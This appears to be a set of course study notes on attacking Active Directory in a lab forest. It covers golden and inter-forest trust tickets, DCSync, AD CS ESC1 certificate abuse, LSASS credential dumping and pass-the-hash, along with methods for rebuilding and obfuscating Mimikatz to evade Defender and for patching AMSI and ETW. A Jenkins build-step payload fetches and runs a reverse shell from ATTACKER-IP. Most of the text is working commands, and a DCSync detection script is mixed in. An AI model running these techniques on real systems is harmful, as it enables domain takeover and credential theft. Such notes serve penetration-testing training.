Using DA access to `dollarcorp.moneycorp.local`, escalate privileges to Enterprise Admin or DA of the parent domain, `moneycorp.local`, using the domain trust key.
## **Solution**

**_Coming Soon_**

# **Child to Parent (Alternative) - using krbtgt hash**

- We will abuse sIDHistory once again. First, get the child domain's krbtgt hash:

```powershell
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
```

- Then forge the ticket:

```powershell
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ptt" "exit"
```

- In the above command, the mimikatz option **"/sids"** forcefully sets the `sIDHistory` of the ticket to the Enterprise Admins group, that is, the Forest Enterprise Admins group.

- On any machine of the current domain:

```powershell
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'
```

- We can now run commands on the remote machine

```powershell
ls \\mcorp-dc.moneycorp.local\c$
```

```powershell
gwmi -class win32_operatingsystem -ComputerName mcorp-dc.moneycorp.local
```

- If you can't get a shell on the remote system with `winrs` and get an error like the one in the screenshot below, here is what to do to get a shell 🤟 (DCSync)

![](https://i.imgur.com/3MYuknZ.png)

1. Run the `dcsync` attack against the forest root (here for the `mcorp\administrator` account)

```powershell
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:mcorp\administrator /domain:moneycorp.local" "exit"
```

2. Now use Over-Pass-the-Hash to start a process as the administrator of `moneycorp.local`, the domain we want the requests to be sent to

```powershell
C:\AD\Tools\Rubeus.exe asktgt /user:moneycorp.local\administrator /domain:moneycorp.local /dc:mcorp-dc.moneycorp.local /aes256:a85958da138b6b0cea2ec07d3cb57b76fdbd6886938c0250bb5873e2b32371a0 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
```

- You should now have a new process running as the domain administrator of `moneycorp.local`; run the `winrs` command again and you should have shell access

```powershell
winrs -r:mcorp-dc cmd
```

![](https://i.imgur.com/mE1snGK.png)

- Avoid suspicious logs by using the Domain Controllers group (bypasses MDI detection)

```powershell
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:dcorp-dc$ /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /groups:516 /sids:S-1-5-21-280534878-1496970234-700767426-516,S-1-5-9 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ptt" "exit"
```

```powershell
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"
```

**_Domain SIDs -:_**

- S-1-5-21-2578538781-2508153159-3419410681-516 - Domain Controllers
- S-1-5-9 - Enterprise Domain Controllers

# **Learning Objective 19**

- Using DA access to `dollarcorp.moneycorp.local`, escalate privileges to Enterprise Admin or DA of the parent domain, `moneycorp.local`, using **dollarcorp's** krbtgt hash.
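Detection for the DCSync step that the sections above keep ending with: a directory replication request (Security event 4662 exercising the DS-Replication-Get-Changes rights) made by something other than a domain controller. This is an added example, not code from the course notes; the 4662 records are constructed with the Security log's field names, the replication-right GUIDs are the real extended-right values, and the DC inventory is assumed for the lab domains.

```python
"""Flag 4662 replication-right usage by non-DC principals (constructed records)."""

# Extended rights a replication partner exercises (AD schema control-access rights).
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}
CONTROL_ACCESS = 0x100  # AccessMask bit set when an extended right is exercised

# (NetBIOS domain, account) pairs allowed to replicate: the lab DCs. Constructed
# here; in production derive the set from the Domain Controllers OU.
KNOWN_DCS = {("DCORP", "DCORP-DC$"), ("MCORP", "MCORP-DC$")}


def extract_guids(properties):
    """Pull the {guid} tokens out of a 4662 Properties field."""
    guids = set()
    for token in properties.replace("{", " ").replace("}", " ").split():
        if len(token) == 36 and token.count("-") == 4:
            guids.add(token.lower())
    return guids


def is_dcsync(ev):
    """True when a 4662 shows a replication right exercised by a non-DC principal."""
    if ev.get("EventID") != 4662 or not ev.get("AccessMask", 0) & CONTROL_ACCESS:
        return False
    if not extract_guids(ev.get("Properties", "")) & REPLICATION_RIGHTS:
        return False
    subject = (ev.get("SubjectDomainName", "").upper(),
               ev.get("SubjectUserName", "").upper())
    # Caveat: a ticket forged for a DC account (the /groups:516 variant above)
    # passes this name check; pair the event with the logon's source address
    # from 4624 and the DC inventory to cover that case.
    return subject not in KNOWN_DCS


def find_dcsync(events):
    return [(ev["SubjectDomainName"], ev["SubjectUserName"], ev["ObjectName"])
            for ev in events if is_dcsync(ev)]


# Constructed samples: a replication request by student1, a legitimate one by
# the DC, and an unrelated control-access read of a user object.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectDomainName": "dcorp", "SubjectUserName": "student1",
     "ObjectName": "DC=dollarcorp,DC=moneycorp,DC=local", "AccessMask": 0x100,
     "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   "\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   "\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectDomainName": "dcorp", "SubjectUserName": "DCORP-DC$",
     "ObjectName": "DC=dollarcorp,DC=moneycorp,DC=local", "AccessMask": 0x100,
     "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   "\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectDomainName": "dcorp", "SubjectUserName": "student1",
     "ObjectName": "CN=svcadmin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local",
     "AccessMask": 0x100,
     "Properties": "Control Access\n\t{00299570-246d-11d0-a768-00aa006e0529}\n"
                   "\t{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]

if __name__ == "__main__":
    for hit in find_dcsync(SAMPLE_EVENTS):
        print("DCSync-like replication by %s\\%s on %s" % hit)
```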
## **Solution**

**_Coming Soon_**

# **Trust Flow Across Forests**

![](https://i.imgur.com/Y447iH2.png)

# **Trust Abuse Across Forests**

![](https://i.imgur.com/91VXRiY.png)

# **Across Forest using Trust Tickets**

- Once again, we require the trust key, this time for the inter-forest trust.

```powershell
Invoke-Mimikatz -Command '"lsadump::trust /patch"'
```

Or

```powershell
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
```

- An inter-forest TGT can then be forged

```powershell
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /rc4:2756bdf7dd8ba8e9c40fe60f654115a0 /service:krbtgt /target:eurocorp.local /ticket:C:\AD\Tools\trust_forest_tkt.kirbi" "exit"
```

- Abuse with Rubeus
- Using the same TGT which we forged earlier:

```powershell
Rubeus.exe asktgs /ticket:C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi /service:cifs/eurocorp-dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /ptt
```

- Now we can run commands on the remote system

```powershell
ls \\eurocorp-dc.eurocorp.local\SharedwithDCorp\
```

# **Learning Objective 20**

- With DA privileges on dollarcorp.moneycorp.local, get access to the SharedwithDCorp share on the DC of the eurocorp.local forest.

## **Solution**

**_Coming Soon_**

# **Across domain trusts - AD CS**

Active Directory Certificate Services (AD CS) enables the use of Public Key Infrastructure (PKI) in an Active Directory forest.
![](https://i.imgur.com/4zrTpzL.png)

{**_Refer to the PDF for more explanation_**}

***

**Practical Example -:**

- We can use the Certify tool (https://github.com/GhostPack/Certify) to enumerate AD CS in the target forest (and for other attacks):

```powershell
Certify.exe cas
```

- Enumerate the templates:

```powershell
Certify.exe find
```

- Enumerate vulnerable templates:

```powershell
Certify.exe find /vulnerable
```

- In moneycorp, there are multiple misconfigurations in AD CS.
- Common requirements/misconfigurations for all the escalations that we have in the lab (ESC1, ESC3 and ESC6):
    - The CA grants normal/low-privileged users enrollment rights
    - Manager approval is disabled
    - Authorization signatures are not required
    - The target template grants normal/low-privileged users enrollment rights

**_Exploiting ESC1_**

In the image below, when we run `C:\AD\Tools\Certify.exe find /enrolleeSuppliesSubject` we get this information; let's break it down 🙂

- The `Template Name` section is the name of the template
- The `Enrollment Rights` section shows the users who can request certificates from the template
- In this case we can't, because we are neither **Domain Admin** nor **Enterprise Admin**
- `ENROLLEE_SUPPLIES_SUBJECT` is also enabled
- All conditions are met except that we are neither **Domain Admin** nor **Enterprise Admin**

![](https://i.imgur.com/BZTno1k.png)

**WHILE**

- We can see the template name below
- `ENROLLEE_SUPPLIES_SUBJECT` is also enabled
- Among the users that can request certificates is `RDPUsers`, the group that all of the student users are a member of
- Cool, we can go ahead and use this

![](https://i.imgur.com/IsyR86f.png)

- The template "HTTPSCertificates" allows enrollment to the RDPUsers group. Request a certificate for DA (or EA) as studentx

```powershell
Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:administrator
```

- Copy the output of both the **RSA Private Key** and the **Certificate**
- Open up Notepad and paste it in
- Then save it with the name `esc1.pem`

![](https://i.imgur.com/niHO6bN.png)

- Run the command below to convert `esc1.pem` to a `.pfx` file, so that `rubeus` understands the format

```powershell
C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc1-DA.pfx
```

> If you are asked for a password in the lab, use **secretpassword123**

- Convert from cert.pem to pfx (esc1.pfx below) and use it to request a TGT for DA (or EA).

```powershell
Rubeus.exe asktgt /user:administrator /certificate:esc1.pfx /password:SecretPass@123 /ptt
```

We should now have access to the DC as domain admin

![](https://i.imgur.com/0kZcMqh.png)

**Escalation to Enterprise Admin**

We can also go ahead and collect both the `Private Key` and `Certificate` for `mcorp-dc`

```powershell
Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:moneycorp.local\administrator
```

- Save the output as usual in Notepad, with the file name `esc1-EA.pem`

![](https://i.imgur.com/RQFiyJK.png)

- Convert

```powershell
C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1-EA.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc1-EA.pfx
```

- Request a TGT for `mcorp-dc`

```powershell
Rubeus.exe asktgt /user:moneycorp.local\Administrator /dc:mcorp-dc.moneycorp.local /certificate:C:\AD\Tools\esc1-EA.pfx /password:SecretPass@123 /ptt
```

- Access `mcorp-dc`

![](https://i.imgur.com/HwJWYTN.png)

# **Learning Objective 21**

- Check if AD CS is used by the target forest and find any vulnerable/abusable templates.
- Abuse any such template(s) to escalate to Domain Admin and Enterprise Admin.

## **Solution**

**_Coming Soon_**

--------------------------------------------------------------------------------
/Lateral Movement.md:
--------------------------------------------------------------------------------

# **Lateral Movement - PowerShell Remoting**

- Think of **PowerShell remoting** (PSRemoting) as psexec on steroids, but much quieter and super fast!
- PSRemoting uses Windows Remote Management (WinRM), which is Microsoft's implementation of WS-Management.
- Enabled by default on Server 2012 onwards, with a firewall exception.
- Uses WinRM and listens by default on 5985 (HTTP) and 5986 (HTTPS).
- It is the recommended way to manage Windows Server Core machines.
- You may need to enable remoting (`Enable-PSRemoting`) on a desktop Windows machine; admin privileges are required to do that.
- The remoting process runs as a high integrity process. That is, you get an elevated shell (a domain account in the local Administrators group gets a full token over WinRM; local accounts are token-filtered by remote UAC unless `LocalAccountTokenFilterPolicy` is set).


## **There are two ways of remoting to a machine**

- [ ] **One-to-One**
  - PSSession
  - Interactive
  - Runs in a new process (wsmprovhost)
  - Is Stateful


> **Note :** When you PSRemote to a machine it is not a powershell.exe process that runs on the target; the commands run inside a **wsmprovhost.exe** (WSMan provider host) process that the WinRM service spins up. Look for that process, not powershell.exe, when hunting for remoting on a host.


- Useful cmdlets

```powershell
$ New-PSSession
$ Enter-PSSession
```


**_Example_**

As shown below we have administrative access on the `dcorp-adminsrv` machine; this is how we get an interactive session on a machine where we have administrative access using **PowerShell Remoting**:


![](https://i.imgur.com/ERPf5mM.png)


- Then run

```powershell
$ exit
$ $adminsrv = New-PSSession dcorp-adminsrv
$ $adminsrv
```


**_Example_**


![](https://i.imgur.com/72tbr19.png)


> **Pros and Cons :** One-to-One is interactive and stateful but does not scale: if we have permissions to move laterally from our machine to, say, 10,000 machines, doing it one session at a time is impractical. With **One-to-Many** the same command runs against all of them in parallel.

- [ ] **One-to-Many**
  - Also known as Fan-out remoting.
  - Non-interactive
  - Executes commands in parallel
  - Useful cmdlets

```powershell
$ Invoke-Command
```


- Run commands and scripts on
  - multiple remote computers,
  - in disconnected sessions (v3)
  - as background jobs and more.
- The best thing in PowerShell for passing the hashes, using credentials and executing commands on multiple remote computers.
- Use the `-Credential` parameter to pass a **username/password**.



- Use below to execute commands or scriptblocks (this will execute the `Get-Process` command on each machine; `Get-Content` reads a file with one hostname per line):

```powershell
$ Invoke-Command -Scriptblock {Get-Process} -ComputerName (Get-Content )
```



- Use below to execute scripts from files

```powershell
$ Invoke-Command -FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content )
```


- Use below to execute a locally loaded function on the remote machines (the function body is serialised and sent, so the function does not need to exist on the target):


```powershell
$ Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content )
```

- In this case, we are passing arguments. Keep in mind that only positional arguments can be passed this way (`-ArgumentList` maps to the function's parameters in order, not by name):

```powershell
$ Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content ) -ArgumentList
```


**_Example Usage_** -:


Run the `whoami` and `hostname` commands on the `$adminsrv` server


![](https://i.imgur.com/SniQryf.png)


- Use below to execute "Stateful" commands using Invoke-Command (the session keeps variables between calls; a plain `-ComputerName` invocation would lose `$Proc`):

```powershell
$ $Sess = New-PSSession -Computername Server1
$ Invoke-Command -Session $Sess -ScriptBlock {$Proc = Get-Process}
$ Invoke-Command -Session $Sess -ScriptBlock {$Proc.Name}
```



## **PowerShell Remoting - Tradecraft**


- PowerShell remoting is subject to system-wide transcription and deep script block logging on the target.
- We can use winrs in place of PSRemoting to evade that logging (and still reap the benefit of 5985 being allowed between hosts). The command runs under winrshost.exe/cmd.exe rather than a PowerShell host, so script block logging and transcription do not see it; process creation logging (4688/Sysmon) still does:

```powershell
winrs -remote:server1 -u:server1\administrator -p:Pass@1234 hostname
```

- We can also use winrm.vbs and the COM objects of the WSMan object - https://github.com/bohops/WSMan-WinRM



# **Lateral Movement - Invoke-Mimikatz**


- Mimikatz can be used to dump credentials, tickets, and many more interesting attacks!
- Invoke-Mimikatz is the PowerShell wrapper for Mimikatz. Using the code from `ReflectivePEInjection`, the Mimikatz binary (embedded in the script) is loaded reflectively into memory, so nothing touches disk. All the functions of Mimikatz can be used from this script.
- The script needs administrative privileges for dumping credentials from the local machine. Many attacks need specific privileges, which are covered while discussing that attack.
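Before moving on to Mimikatz, here is a worked fan-out for the One-to-Many and stateful-session subsections above. It is an added example, not code from the course or from these notes. It assumes a hosts file with one name per line (`C:\AD\Tools\servers.txt` is a hypothetical name) and that WinRM on 5985 is reachable from the foothold; everything else is standard PowerShell.

```powershell
# Added example (not from the course or its notes): fan out over WinRM to find the hosts
# where a session can be opened and whether that session is elevated, then keep stateful
# sessions to the elevated ones. Assumptions not taken from the page: hostnames come from
# a text file (one per line) and WinRM (5985) is reachable from the foothold.

function Find-WinRMAccess {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string[]] $ComputerName,
        [pscredential] $Credential,          # omit to use the current token (e.g. after over-pass-the-hash)
        [int] $ThrottleLimit = 32
    )

    # Runs on each target. A session alone does not prove local admin: members of
    # "Remote Management Users" can also connect, but they get a non-elevated token.
    $probe = {
        $id = [Security.Principal.WindowsIdentity]::GetCurrent()
        $pr = [Security.Principal.WindowsPrincipal]$id
        [pscustomobject]@{
            RunAs   = $id.Name
            IsAdmin = $pr.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
        }
    }

    $icm = @{
        ComputerName  = $ComputerName
        ScriptBlock   = $probe
        ThrottleLimit = $ThrottleLimit     # parallel connections; raise for large fleets
        ErrorAction   = 'SilentlyContinue'
        ErrorVariable = 'failed'           # unreachable / access-denied hosts land here
    }
    if ($Credential) { $icm.Credential = $Credential }

    foreach ($r in (Invoke-Command @icm)) {
        [pscustomobject]@{ ComputerName = $r.PSComputerName; Reachable = $true; IsAdmin = $r.IsAdmin; RunAs = $r.RunAs; Error = $null }
    }
    foreach ($e in $failed) {
        # OriginInfo names the target of the failed connection. "Access is denied" means WinRM answered
        # but the account is neither a local admin nor in Remote Management Users.
        [pscustomobject]@{ ComputerName = $e.OriginInfo.PSComputerName; Reachable = $false; IsAdmin = $false; RunAs = $null; Error = $e.Exception.Message }
    }
}

function New-AdminSession {
    # Stateful follow-up: one persistent session per host that came back elevated.
    param([Parameter(Mandatory)] [object[]] $AccessResult, [pscredential] $Credential)
    $targets = $AccessResult | Where-Object { $_.Reachable -and $_.IsAdmin } | Select-Object -ExpandProperty ComputerName
    if (-not $targets) { return }
    $new = @{ ComputerName = $targets }
    if ($Credential) { $new.Credential = $Credential }
    New-PSSession @new
}

# Usage from the foothold (servers.txt is a hypothetical hosts file):
#   $access = Find-WinRMAccess -ComputerName (Get-Content C:\AD\Tools\servers.txt)
#   $access | Format-Table -AutoSize
#   $sessions = New-AdminSession -AccessResult $access
#   Invoke-Command -Session $sessions -ScriptBlock { param($n) Get-Process -Name $n } -ArgumentList lsass
```

The `IsAdmin` column is the check worth keeping: a session that opens is not proof of local admin, because Remote Management Users can also connect, and the token the target actually hands us is what decides whether LSASS can be touched later. The last usage line shows the positional `-ArgumentList` rule from above: `lsass` lands in `$n` by position.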



## **Lateral Movement - Extracting Credentials from LSASS**

All of these need **Local Admin Access** (the `SeDebugPrivilege` that comes with it is what lets a process open LSASS).

- Dump credentials on a local machine using Mimikatz. `sekurlsa::ekeys` lists the Kerberos keys (AES256, AES128 and RC4, the last being the NT hash) of every logon session; these are the inputs for the over-pass-the-hash commands further down.

```powershell
$ Invoke-Mimikatz -Command '"sekurlsa::ekeys"'
```


- Using SafetyKatz (minidump of lsass and PELoader to run Mimikatz)

```powershell
$ SafetyKatz.exe "sekurlsa::ekeys"
```


- Dump credentials using SharpKatz (C# port of some of Mimikatz's functionality).

```powershell
$ SharpKatz.exe --Command ekeys
```



- Dump credentials using Dumpert (direct system calls and API unhooking)


```powershell
$ rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump
```


- Using pypykatz (Mimikatz functionality in Python)

```powershell
$ pypykatz.exe live lsa
```


- Using comsvcs.dll (very aggressively detected). First get the PID of lsass.exe, then pass it to the `MiniDump` export:

```powershell
$ tasklist /FI "IMAGENAME eq lsass.exe"
$ rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <lsass PID> C:\Users\Public\lsass.dmp full
```



- From a Linux attacking machine using `impacket`.
- From a Linux attacking machine using `Physmem2profit`.


> **Note :** Anything that interacts with LSASS has a higher chance of detection, so before trying to extract credentials from LSASS we can try other avenues first, e.g. PowerShell console history (`ConsoleHost_history.txt`), the local SAM and SECURITY hives, saved credentials in Credential Manager, configuration files and notes.


## **Lateral Movement - OverPass-The-Hash**


- Over Pass the hash (OPTH) generates tokens (and a TGT) from hashes or keys. Prefer the AES256 key over the RC4/NT hash: a TGT requested with RC4 for an account that supports AES is an encryption downgrade and a common detection.
- The Mimikatz/SafetyKatz form needs elevation (Run as administrator).

- Using `Mimikatz`

```powershell
$ Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:us.techcorp.local /aes256: /run:powershell.exe"'
```

- Using `SafetyKatz`

```powershell
$ SafetyKatz.exe "sekurlsa::pth /user:administrator /domain:us.techcorp.local /aes256: /run:cmd.exe" "exit"
```


- The above commands start a new process with a logon type 9 (same as `runas /netonly`): local access stays as the current user, while network authentication uses the injected key.

- Using `Rubeus`. Below doesn't need elevation (it will overwrite the current logon session's TGT):


```powershell
$ Rubeus.exe asktgt /user:administrator /rc4: /ptt
```


- Below command needs elevation; `/opsec` makes the AS-REQ exchange look like a genuine Windows client and `/createnetonly` keeps the ticket in a fresh logon session instead of overwriting ours.


```powershell
$ Rubeus.exe asktgt /user:administrator /aes256: /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
```



## **Lateral Movement - DCSync**


- To extract credentials from the DC without code execution on it, we can use DCSync (the DRSUAPI replication calls a DC would make to another DC).
- To use the DCSync feature for getting the krbtgt hash, execute one of the below commands with DA privileges for the us domain:


```powershell
$ Invoke-Mimikatz -Command '"lsadump::dcsync /user:us\krbtgt"'
$ SafetyKatz.exe "lsadump::dcsync /user:us\krbtgt" "exit"
```

- By default, Domain Admins privileges are required to run DCSync; strictly, what is needed are the `DS-Replication-Get-Changes` and `DS-Replication-Get-Changes-All` rights on the domain object, which DAs, Enterprise Admins and DCs hold and which can be delegated to any principal.



# **Offensive .NET - Introduction**



- Currently, .NET lacks some of the security features implemented in System.Management.Automation.dll (e.g. script block logging and transcription).
- Because of this, many red teams have included .NET in their tradecraft.
- There are many open source offensive .NET tools and we will use the ones that fit our attack methodology.
- When using .NET (or any other compiled language) there are some challenges:
  - Detection by countermeasures like AV, EDR etc.
  - Delivery of the payload (recall PowerShell's sweet download-execute cradles)
  - Detection by logging like process creation logging, command line logging etc.
- We will address AV detection and delivery of the payload as and when required.
- The course instructors say we are on our own when the binaries they share start getting detected by Windows Defender :). They don't know I do pentests 🤫 (Forever loud!!!)
- We will focus mostly on bypassing signature-based detection by Windows Defender.
- For that, we can use techniques like obfuscation, string manipulation etc.
- We can use `DefenderCheck` (https://github.com/matterpreter/DefenderCheck) to identify the code and strings in a binary that Windows Defender flags. It splits the file repeatedly and scans each part with the local Defender engine until it isolates the byte range that triggers the signature.
- This helps us decide what to modify in the source code and keep the obfuscation minimal.

## **Offensive .NET - Tradecraft - AV bypass - DefenderCheck**


- Let's check SharpKatz.exe for signatures using DefenderCheck (the path of the binary to check is passed as the argument):


```powershell
$ DefenderCheck.exe
```



**_Example_** -:


![](https://i.imgur.com/TkcfMJY.png)


## **Using DefenderCheck Output to Manipulate strings**


- Generally it is a process of trial and error: we keep replacing the strings reported by `DefenderCheck` (renaming them consistently in the source, then rebuilding) until AV no longer detects the binary 🥏. Here is an example bypass:


![](https://i.imgur.com/MegfEKj.png)


## **Offensive .NET - Tradecraft - AV bypass - String Manipulation**


- [ ] For SafetyKatz, we used the following steps
  - Download the latest version of Mimikatz and Out-CompressedDll.ps1
  - Run the Out-CompressedDll.ps1 PowerShell script on the Mimikatz binary and save the output to a file

```powershell
$ Out-CompressedDll > outputfilename.txt
```

  - Copy the value of the variable "`$EncodedCompressedFile`" from the output file (`outputfilename.txt`) above and replace the value of the "`compressedMimikatzString`" variable in the "`Constants.cs`" file of **SafetyKatz**.


![](https://i.imgur.com/1EinKFj.png)


  - Copy the byte size from the output file (`outputfilename.txt`) and replace it in the "`Program.cs`" file of **SafetyKatz** on lines 111 & 116.
  - Build and recheck the binary with `DefenderCheck`.


![](https://i.imgur.com/Yr4pM6x.png)




## **Offensive .NET - Tradecraft - AV bypass - BetterSafetyKatz**

- [ ] For BetterSafetyKatz, we used the following steps
  - Download the latest release of the "mimikatz_trunk.zip" file.
  - Convert the file to a **Base64** value

![](https://i.imgur.com/iLqskcG.png)


  - Modify the "`Program.cs`" file:
    - Add a new variable that contains the base64 value of the "mimikatz_trunk.zip" file.
    - Comment out the code that downloads or accepts the mimikatz file as an argument.
    - Convert the base64 string to bytes and pass it to the "zipStream" variable.


![](https://i.imgur.com/MwCMxQN.png)



## **Offensive .NET - Tradecraft - AV bypass - Obfuscation**



- For Rubeus.exe, we used ConfuserEx (https://github.com/mkaring/ConfuserEx) to obfuscate the binary

![](https://i.imgur.com/mdkEh2t.png)


**Usage** -:


- Launch ConfuserEx
- In the Project tab select the Base Directory where the binary file is located.
- In the Project tab select the binary file that we want to obfuscate.
- In the Settings tab add the rules.
- In the Settings tab edit the rule and select the preset `Normal`.
- In the Protect tab click on the Protect button.
- We will find the new obfuscated binary in the Confused folder under the Base Directory.


![](https://i.imgur.com/FwiuSFo.png)


## **Offensive .NET - Tradecraft - Payload Delivery**


- We can use NetLoader (https://github.com/Flangvik/NetLoader) to deliver our binary payloads.
- It can be used to load a binary from a file path or URL and patch AMSI & ETW in its own process while executing it.


```powershell
$ C:\Users\Public\Loader.exe -path http://192.168.100.X/SafetyKatz.exe
```


- We also have AssemblyLoad.exe that can be used to load NetLoader in memory from a URL, which then loads a binary from a file path or URL, so only the small AssemblyLoad stub touches disk.


```powershell
$ C:\Users\Public\AssemblyLoad.exe http://192.168.100.X/Loader.exe -path http://192.168.100.X/SafetyKatz.exe
```


# **Learning Objective 7**


- Identify a machine in the target domain where a Domain Admin session is available.
- Compromise the machine and escalate privileges to Domain Admin
  - Using access to `dcorp-ci`
  - Using derivative local admin


## **Solution**

**_Coming Soon_**


--------------------------------------------------------------------------------
/Local Privilege Escalation.md:
--------------------------------------------------------------------------------
---
~
---
# **Local Privilege Escalation**

There are various ways of locally escalating privileges on a Windows box -:
- Missing patches
- Automated deployment and Auto Logon passwords in clear text
- AlwaysInstallElevated (any user can run an MSI as SYSTEM)
- Misconfigured services
- DLL hijacking and more
- NTLM relaying a.k.a. won't fix


We can use the below tools for complete coverage


- PowerUp - https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
- PrivEsc - https://github.com/enjoiz/Privesc
- WinPEAS - https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/

# Service Issues using `PowerUp`

- Get services with unquoted paths and a space in their name (Windows then tries `C:\Program.exe`, `C:\Program Files\Some.exe`, ... in order, so a binary we can drop at an earlier path wins)


```powershell
$ Get-ServiceUnquoted -Verbose
```



- Get services where the current user can write to its binary or change arguments to the binary

```powershell
$ Get-ModifiableServiceFile -Verbose
```



- Get the services whose configuration the current user can modify

```powershell
$ Get-ModifiableService -Verbose
```



We can also automate this by using the below commands


```powershell
# For PowerUp
$ Invoke-AllChecks

# For PrivEsc
$ Invoke-PrivEsc

# For PEASS-ng
$ winPEASx64.exe
```

```
# Add users to a local group by abusing the services where users can change arguments to the binary:
https://powersploit.readthedocs.io/en/latest/Privesc/Invoke-ServiceAbuse/
```

**Feature Abuse**

- What we have been doing up to now (and will keep doing further in the class) is relying on feature abuse.
- Feature abuse is awesome as there are seldom patches for it and it is not the focus of security teams!
- One of my favorite feature abuses is targeting enterprise applications which are not built keeping security in mind.
- On Windows, many enterprise applications need either Administrative privileges or SYSTEM privileges, making them a great avenue for privilege escalation.

**Example - Jenkins -:**


- Let's use an older version of Jenkins as an example of a vulnerable enterprise application.
- Jenkins is a widely used Continuous Integration tool.
- There are many interesting aspects to Jenkins but for now we limit our discussion to the ability to run system commands on Jenkins.
- There is a Jenkins server running on dcorp-ci (172.16.3.11) on port 8080.

**Exploit -:**

- If we have admin access (default installation before 2.x):
  - Navigate to the script console and run OS commands through Groovy. Only the tail of that snippet survives on this page (the `http://` script-console URL and the start of the Groovy command were lost):

```groovy
$sout err> $serr"
```



- If you don't have admin access but could add or edit build steps in the build configuration.
  - Add a build step: navigate to `/job/Project0/configure` (if you get a `403`, keep changing Project0 to Project1, Project2, Project3 ... till you get a `200`)
  - Scroll down to the option "**Build steps**" and on the drop down select/add "**Execute Windows Batch Command**" and enter-:

```powershell
powershell iex (iwr -UseBasicParsing http://ATTACKER-IP/Invoke-PowerShellTcp.ps1);power -Reverse -IPAddress ATTACKER-IP -Port 443
```

- Now we can go ahead and start up a listener with netcat, using the `netcat.exe` version, to listen on the specified port

```bat
C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443
```

- We also need to host our `Invoke-PowerShellTcp.ps1` script as stated in the payload; we can use a tool called **HTTP File Server (HFS)** or just Google what works for you (drag and drop `Invoke-PowerShellTcp.ps1` onto the left pane)


![](https://i.imgur.com/0MnoHoT.png)

- We also need to turn off the Windows firewall (or add an inbound exception for the listener port) for this to work, so do that as well


![](https://i.imgur.com/ksH2Ukn.png)




- Again, you could download and execute scripts, run encoded scripts and more.


> **General Note :** Many users use their username as password, so make sure to try something like `manager:manager`



# **Learning Objective 5**


- Exploit a service on dcorp-studentx and elevate privileges to local administrator.
- Identify a machine in the domain where studentx has local administrative access.
- Using privileges of a user on Jenkins on 172.16.3.11:8080, get admin privileges on 172.16.3.11 - the dcorp-ci server


## **Solution**


**_Coming Soon_**

> **Note :** Renaming the built-in Administrator account is sometimes recommended as hardening, but it does not hide the account: it keeps RID 500, so anyone enumerating by **SID** still identifies it as Admin 🙂.





--------------------------------------------------------------------------------
/Methodology.md:
--------------------------------------------------------------------------------

# **Things to take note Of**

- Remember to turn off, or add an exception to, your student VM's firewall when you run a listener for a reverse shell.
- The `C:\` directory is exempted from Windows Defender, but AMSI may still detect some tools when you load them into PowerShell.
- Use the following to bypass AMSI after loading Invisi-Shell (it sets the private static `amsiInitFailed` field of `System.Management.Automation.AmsiUtils` to true, so the session stops calling AMSI) -:


```powershell
